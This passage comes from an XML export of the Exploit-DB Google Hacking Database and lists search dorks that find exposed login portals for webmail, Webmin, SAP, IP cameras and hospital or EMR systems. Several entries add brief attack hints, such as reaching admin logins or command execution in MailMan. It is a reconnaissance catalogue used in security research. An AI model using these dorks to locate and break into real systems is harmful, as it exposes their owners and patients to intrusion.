<textualDescription>Anyboard Login Portals. In addition,A vulnerability has been reported in Netbula Anyboard 9.x &quot;that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker.&quot;</textualDescription>
<query>intitle:&quot;Login Forum Powered By AnyBoard&quot; intitle:&quot;If you are a new user:&quot; intext:&quot;Forum Powered By AnyBoard&quot; inurl:gochat -edu</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Login+Forum+Powered+By+AnyBoard%22+intitle%3A%22If+you+are+a+new+user%22+intext%3A%22Forum+Powered+By+AnyBoard%22+inurl%3Agochat+-edu</querystring>
<edb></edb>
<date>2005-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>7976</id>
<link>https://www.exploit-db.com/ghdb/7976</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login page for&quot; inurl:user.cgi</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login page for&quot; inurl:user.cgi
# Category: Pages Containing Login Portals
# Date: 20/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Login page for&quot; inurl:user.cgi</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login page for&quot; inurl:user.cgi</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5420</id>
<link>https://www.exploit-db.com/ghdb/5420</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login page&quot; intext:&quot;about SurgeMail&quot;</shortDescription>
<textualDescription>Login Page:
intitle:&quot;Login page&quot; intext:&quot;about SurgeMail&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Login page&quot; intext:&quot;about SurgeMail&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login page&quot; intext:&quot;about SurgeMail&quot;</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4242</id>
<link>https://www.exploit-db.com/ghdb/4242</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login Page&quot; intext:&quot;Phone Adapter Configuration Utility&quot;</shortDescription>
<textualDescription>Various online Cisco VOIP devices (SPA 112)! More info:
http://www.cisco.com/
Author: Augusto Pereira
http://www.augustopereira.com.br</textualDescription>
<query>intitle:&quot;Login Page&quot; intext:&quot;Phone Adapter Configuration Utility&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login Page&quot; intext:&quot;Phone Adapter Configuration Utility&quot;</querystring>
<edb></edb>
<date>2016-03-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>1294</id>
<link>https://www.exploit-db.com/ghdb/1294</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to @Mail&quot; (ext:pl | inurl:&quot;index&quot;) -dwaffleman</shortDescription>
<textualDescription>Webmail is a http based email server made by atmail.com. To get to the admin login instead of regular login add webadmin/ to the url.</textualDescription>
<query>intitle:&quot;Login to @Mail&quot; (ext:pl | inurl:&quot;index&quot;) -dwaffleman</query>
<querystring>https://www.google.com/search?q=intitle:%22Login+to+%40Mail%22+(ext:pl+%7C+inurl:%22index%22)+-dwaffleman&amp;num=100&amp;safe=off&amp;rls=org.mozilla:en-US:official_s&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>1401</id>
<link>https://www.exploit-db.com/ghdb/1401</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to @Mail&quot; (ext:pl | inurl:&quot;index&quot;) -dwaffleman</shortDescription>
<textualDescription>Webmail is a http based email server made by atmail.com. To get to the admin login instead of the regular login add webadmin/ to the url.</textualDescription>
<query>intitle:&quot;Login to @Mail&quot; (ext:pl | inurl:&quot;index&quot;) -dwaffleman</query>
<querystring>https://www.google.com/search?q=intitle:%22Login+to+%40Mail%22+(ext:pl+%7C+inurl:%22index%22)+-dwaffleman&amp;num=100&amp;safe=off&amp;rls=org.mozilla:en-US:official_s&amp;filter=0</querystring>
<edb></edb>
<date>2006-08-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1026</id>
<link>https://www.exploit-db.com/ghdb/1026</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to Cacti&quot;</shortDescription>
<textualDescription>Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.</textualDescription>
<query>intitle:&quot;Login to Cacti&quot;</query>
<querystring>https://www.google.com/search?biw=1003&amp;q=intitle%3A%22Login+to+Cacti%22</querystring>
<edb></edb>
<date>2005-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7980</id>
<link>https://www.exploit-db.com/ghdb/7980</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to ICC PRO system&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login to ICC PRO system&quot;
# Category: Pages Containing Login Portals
# Date: 20/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Login to ICC PRO system&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login to ICC PRO system&quot;</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7979</id>
<link>https://www.exploit-db.com/ghdb/7979</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to Redash&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login to Redash&quot;
# Category: Pages Containing Login Portals
# Date: 20/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Login to Redash&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login to Redash&quot;</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7842</id>
<link>https://www.exploit-db.com/ghdb/7842</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to SDT-CS3B1&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login to SDT-CS3B1&quot;
# Pages Containing Login Portals
# Date:14/06/2022
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;Login to SDT-CS3B1&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login to SDT-CS3B1&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>1128</id>
<link>https://www.exploit-db.com/ghdb/1128</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to the forums - @www.aimoo.com&quot; inurl:login.cfm?id=</shortDescription>
<textualDescription>Aimoo Login Pages. &quot;Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!&quot;</textualDescription>
<query>intitle:&quot;Login to the forums - @www.aimoo.com&quot; inurl:login.cfm?id=</query>
<querystring>https://www.google.com/search?q=intitle:%22Login+to+the+forums+-+%40www.aimoo.com%22+inurl:login.cfm%3Fid%3D&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6513</id>
<link>https://www.exploit-db.com/ghdb/6513</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login to webmin&quot; &quot;You must enter a username and password to login to the Webmin server&quot;</shortDescription>
<textualDescription>intitle:&quot;login to webmin&quot; &quot;You must enter a username and password to login to the Webmin server&quot;
BR,
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;login to webmin&quot; &quot;You must enter a username and password to login to the Webmin server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login to webmin&quot; &quot;You must enter a username and password to login to the Webmin server&quot;</querystring>
<edb></edb>
<date>2020-09-01</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5479</id>
<link>https://www.exploit-db.com/ghdb/5479</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login to Webmin&quot; intext:&quot;You must enter a username and password to login to the server&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;Login to Webmin&quot; intext:&quot;You must enter a username and
password to login to the server&quot;
Author: M. Cory Billington (@_th3y)
Info: WebMin Login portals
</textualDescription>
<query>intitle:&quot;Login to Webmin&quot; intext:&quot;You must enter a username and password to login to the server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login to Webmin&quot; intext:&quot;You must enter a username and password to login to the server&quot;</querystring>
<edb></edb>
<date>2019-08-30</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>6874</id>
<link>https://www.exploit-db.com/ghdb/6874</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login&quot; &quot;Are you a patient&quot; &quot; eRAD&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;login&quot; &quot;Are you a patient&quot; &quot; eRAD&quot;
# Pages Containing Login Portals(EMR Systems)
# Date: 15/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;login&quot; &quot;Are you a patient&quot; &quot; eRAD&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login&quot; &quot;Are you a patient&quot; &quot; eRAD&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7217</id>
<link>https://www.exploit-db.com/ghdb/7217</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login&quot; &quot;Clare Controls LLC&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;login&quot; &quot;Clare Controls LLC&quot;
# Pages Containing Login Portals
# Date: 11/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;login&quot; &quot;Clare Controls LLC&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login&quot; &quot;Clare Controls LLC&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7972</id>
<link>https://www.exploit-db.com/ghdb/7972</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; -com &quot;/doc/page/login.asp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; -com &quot;/doc/page/login.asp&quot;
# Category: Pages Containing Login Portals
# Date: 14/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Login&quot; -com &quot;/doc/page/login.asp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; -com &quot;/doc/page/login.asp&quot;</querystring>
<edb></edb>
<date>2022-07-19</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6931</id>
<link>https://www.exploit-db.com/ghdb/6931</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; intext:&quot;(Moka pot)&quot; inurl:&quot;login.php&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Login&quot; intext:&quot;(Moka pot)&quot; inurl:&quot;login.php&quot;</textualDescription>
<query>intitle:&quot;Login&quot; intext:&quot;(Moka pot)&quot; inurl:&quot;login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; intext:&quot;(Moka pot)&quot; inurl:&quot;login.php&quot;</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7817</id>
<link>https://www.exploit-db.com/ghdb/7817</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; intext:&quot;cam&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; intext:&quot;cam&quot;
# Pages Containing Login Portals
# Date:16/11/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;Login&quot; intext:&quot;cam&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; intext:&quot;cam&quot;</querystring>
<edb></edb>
<date>2021-11-16</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>6872</id>
<link>https://www.exploit-db.com/ghdb/6872</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; intext:&quot;Herospeed Technology&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; intext:&quot;Herospeed Technology&quot;
# Pages Containing Login Portals
# Date: 13/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Login&quot; intext:&quot;Herospeed Technology&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; intext:&quot;Herospeed Technology&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7080</id>
<link>https://www.exploit-db.com/ghdb/7080</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; intext:&quot;IP Surveillance for Your Life&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; intext:&quot;IP Surveillance for Your Life&quot;
# Pages Containing Login Portals
# Date: 12/07/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>intitle:&quot;Login&quot; intext:&quot;IP Surveillance for Your Life&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; intext:&quot;IP Surveillance for Your Life&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>4230</id>
<link>https://www.exploit-db.com/ghdb/4230</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; intext:&quot;Use Web Messaging Lite&quot;</shortDescription>
<textualDescription>Description: Webmail login page
Google search: intitle:&quot;Login&quot; intext:&quot;Use Web Messaging Lite&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;Login&quot; intext:&quot;Use Web Messaging Lite&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; intext:&quot;Use Web Messaging Lite&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4811</id>
<link>https://www.exploit-db.com/ghdb/4811</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; inurl:&quot;/itim/self&quot; | inurl:&quot;/itim/ui&quot; -ibm.com</shortDescription>
<textualDescription>Pages using &quot;IBM Tivoli Identity Manager&quot; as login portals.
Vaibhav Dhote
</textualDescription>
<query>intitle:&quot;Login&quot; inurl:&quot;/itim/self&quot; | inurl:&quot;/itim/ui&quot; -ibm.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; inurl:&quot;/itim/self&quot; | inurl:&quot;/itim/ui&quot; -ibm.com</querystring>
<edb></edb>
<date>2018-05-10</date>
<author>Vaibhav Dhote</author>
</entry>
<entry>
<id>7082</id>
<link>https://www.exploit-db.com/ghdb/7082</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login&quot; inurl:&quot;idp/profile/login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;login&quot; inurl:&quot;idp/profile/login&quot;
# Pages Containing Login Portals
# Date: 14/07/2021
# Exploit Author: Abhijit Gaikwad
</textualDescription>
<query>intitle:&quot;login&quot; inurl:&quot;idp/profile/login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login&quot; inurl:&quot;idp/profile/login&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Abhijit Gaikwad</author>
</entry>
<entry>
<id>7120</id>
<link>https://www.exploit-db.com/ghdb/7120</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; inurl:&quot;view/login.html&quot; &quot;Huawei Technologies&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; inurl:&quot;view/login.html&quot; &quot;Huawei Technologies&quot;
# Category: Pages Containing Login Portals
# Date: 06/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Login&quot; inurl:&quot;view/login.html&quot; &quot;Huawei Technologies&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; inurl:&quot;view/login.html&quot; &quot;Huawei Technologies&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6984</id>
<link>https://www.exploit-db.com/ghdb/6984</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login&quot; inurl:web/frame/login.html?ssl=</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; inurl:web/frame/login.html?ssl=
# Pages Containing Login Portals
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Login&quot; inurl:web/frame/login.html?ssl=</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; inurl:web/frame/login.html?ssl=</querystring>
<edb></edb>
<date>2021-06-03</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5529</id>
<link>https://www.exploit-db.com/ghdb/5529</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login&quot; site:welcome.*.*</shortDescription>
<textualDescription>Login Portal:
intitle:&quot;login&quot; site:welcome.*.*
site:email.*.* intitle:&quot;login&quot;
site:host.*.* intitle:&quot;login&quot;
site:mailserver.*.* intitle:&quot;login&quot;
site:ns.*.* intitle:&quot;login&quot;
site:ns1.*.* intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;login&quot; site:welcome.*.*</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login&quot; site:welcome.*.*</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4736</id>
<link>https://www.exploit-db.com/ghdb/4736</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login&quot; | intitle:&quot;hospital&quot; &quot;patient&quot; &quot;clinic&quot; &quot;admin&quot; &quot;medical&quot; &quot;login&quot; -stackoverflow -github -youtube</shortDescription>
<textualDescription>Medical related login portals
Bruno Schmid
</textualDescription>
<query>intitle:&quot;login&quot; | intitle:&quot;hospital&quot; &quot;patient&quot; &quot;clinic&quot; &quot;admin&quot; &quot;medical&quot; &quot;login&quot; -stackoverflow -github -youtube</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login&quot; | intitle:&quot;hospital&quot; &quot;patient&quot; &quot;clinic&quot; &quot;admin&quot; &quot;medical&quot; &quot;login&quot; -stackoverflow -github -youtube</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4735</id>
<link>https://www.exploit-db.com/ghdb/4735</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login&quot; | intitle:&quot;sign in&quot; &quot;member&quot; &quot;private&quot; &quot;admin&quot; &quot;club&quot; -stackoverflow -github -youtube</shortDescription>
<textualDescription>More login portals
Bruno Schmid
</textualDescription>
<query>intitle:&quot;login&quot; | intitle:&quot;sign in&quot; &quot;member&quot; &quot;private&quot; &quot;admin&quot; &quot;club&quot; -stackoverflow -github -youtube</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login&quot; | intitle:&quot;sign in&quot; &quot;member&quot; &quot;private&quot; &quot;admin&quot; &quot;club&quot; -stackoverflow -github -youtube</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7930</id>
<link>https://www.exploit-db.com/ghdb/7930</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login. MicroStrategy&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Login. MicroStrategy&quot;
# Page Containing Login Portals
# Date: 30/03/2022
# Exploit Author: Acmello</textualDescription>
<query>intitle:&quot;Login. MicroStrategy&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login. MicroStrategy&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Acmello</author>
</entry>
<entry>
<id>4227</id>
<link>https://www.exploit-db.com/ghdb/4227</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Logon - SAP Web Application Server&quot;</shortDescription>
<textualDescription>Description: SAP Web Application Server login page
Google search: intitle:&quot;Logon - SAP Web Application Server&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;Logon - SAP Web Application Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Logon - SAP Web Application Server&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>7507</id>
<link>https://www.exploit-db.com/ghdb/7507</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;LoRaWAN Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;LoRaWAN Login&quot;
# Pages Containing Login Portals
# Date:27/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;LoRaWAN Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;LoRaWAN Login&quot;</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>Suman Das</author>
</entry>
<entry>
<id>4164</id>
<link>https://www.exploit-db.com/ghdb/4164</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Lost Password Reset&quot; | inurl:/secure/pwreset.php | inurl:/portal/index.php</shortDescription>
<textualDescription>Lost Password Reset for Websites.
-Xploit </textualDescription>
<query>intitle:&quot;Lost Password Reset&quot; | inurl:/secure/pwreset.php | inurl:/portal/index.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Lost Password Reset&quot; | inurl:/secure/pwreset.php | inurl:/portal/index.php</querystring>
<edb></edb>
<date>2015-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4136</id>
<link>https://www.exploit-db.com/ghdb/4136</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Mail - AfterLogic WebMail&quot;</shortDescription>
<textualDescription>AfterLogic WebMail Login Portals.
Decoy</textualDescription>
<query>intitle:&quot;Mail - AfterLogic WebMail&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Mail - AfterLogic WebMail&quot;</querystring>
<edb></edb>
<date>2015-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7075</id>
<link>https://www.exploit-db.com/ghdb/7075</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Mail2000 Message System&quot; &quot;Openfind Information&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Mail2000 Message System&quot; &quot;Openfind Information&quot;
# Category: Pages Containing Login Portals
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Mail2000 Message System&quot; &quot;Openfind Information&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Mail2000 Message System&quot; &quot;Openfind Information&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>551</id>
<link>https://www.exploit-db.com/ghdb/551</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MailMan Login&quot;</shortDescription>
<textualDescription>MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation. MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'.</textualDescription>
<query>intitle:&quot;MailMan Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22MailMan+Login%22+++&amp;btnG=Suche</querystring>
<edb></edb>
<date>2004-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>7115</id>
<link>https://www.exploit-db.com/ghdb/7115</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ManageEngine ServiceDesk Plus&quot; &quot;domain&quot; intext:&quot;ManageEngine ServiceDesk Plus&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ManageEngine ServiceDesk Plus&quot; &quot;domain&quot; intext:&quot;ManageEngine ServiceDesk Plus&quot; -.com
# Category: Pages Containing Login Portals
# Date: 04/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;ManageEngine ServiceDesk Plus&quot; &quot;domain&quot; intext:&quot;ManageEngine ServiceDesk Plus&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ManageEngine ServiceDesk Plus&quot; &quot;domain&quot; intext:&quot;ManageEngine ServiceDesk Plus&quot; -.com</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4885</id>
<link>https://www.exploit-db.com/ghdb/4885</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;manager area&quot; password -stackoverflow.com</shortDescription>
<textualDescription>Login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;manager area&quot; password -stackoverflow.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;manager area&quot; password -stackoverflow.com</querystring>
<edb></edb>
<date>2018-07-06</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7193</id>
<link>https://www.exploit-db.com/ghdb/7193</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com
# Pages Containing Login Portals
# Date: 09/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com</querystring>
<edb></edb>
<date>2021-09-13</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7054</id>
<link>https://www.exploit-db.com/ghdb/7054</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MediaAccess Gateway - Login&quot; &quot;access your MediaAccess Gateway&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;MediaAccess Gateway - Login&quot; &quot;access your MediaAccess Gateway&quot;
# Category: Pages Containing Login Portals
# Date: 09/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;MediaAccess Gateway - Login&quot; &quot;access your MediaAccess Gateway&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;MediaAccess Gateway - Login&quot; &quot;access your MediaAccess Gateway&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>1043</id>
<link>https://www.exploit-db.com/ghdb/1043</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Member Login&quot; &quot;NOTE: Your browser must have cookies enabled in order to log into the site.&quot; ext:php OR ext:cgi</shortDescription>
<textualDescription>Pretty standered login pages, they all have various differences but it appears that they use the same script or software.</textualDescription>
<query>intitle:&quot;Member Login&quot; &quot;NOTE: Your browser must have cookies enabled in order to log into the site.&quot; ext:php OR ext:cgi</query>
<querystring>https://www.google.com/search?q=intitle:%22Member+Login%22+%22NOTE:+Your+browser+must+have+cookies+enabled+in+order+to+log+into+the+site.%22+ext:php+OR+ext:cgi&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-07-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1188</id>
<link>https://www.exploit-db.com/ghdb/1188</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Merak Mail Server Web Administration&quot; -ihackstuff.com</shortDescription>
<textualDescription>User login pages for Merak Email Server Suite which consists of Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWaremore info: h**p://www.icewarp.com</textualDescription>
<query>intitle:&quot;Merak Mail Server Web Administration&quot; -ihackstuff.com</query>
<querystring>https://www.google.com/search?q=intitle:%22Merak+Mail+Server+Web+Administration%22+-ihackstuff.com&amp;num=100&amp;&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>509</id>
<link>https://www.exploit-db.com/ghdb/509</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;microsoft certificate services&quot; inurl:certsrv</shortDescription>
<textualDescription>Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as &quot;proof&quot; that someone or something is what they claim they are. The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such.</textualDescription>
<query>intitle:&quot;microsoft certificate services&quot; inurl:certsrv</query>
<querystring>https://www.google.com/search?q=intitle%3A%22microsoft+certificate+services%22+inurl%3Acertsrv</querystring>
<edb></edb>
<date>2004-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4167</id>
<link>https://www.exploit-db.com/ghdb/4167</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Microsoft+Outlook+Web+Access+Log+On&quot; | inurl:/owa/auth/logon.aspx</shortDescription>
<textualDescription>Microsoft Outlook Web Logins
-Xploit </textualDescription>
<query>intitle:&quot;Microsoft+Outlook+Web+Access+Log+On&quot; | inurl:/owa/auth/logon.aspx</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Microsoft+Outlook+Web+Access+Log+On&quot; | inurl:/owa/auth/logon.aspx</querystring>
<edb></edb>
<date>2015-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4232</id>
<link>https://www.exploit-db.com/ghdb/4232</link>
<category>Pages Containing Login Portals</category>
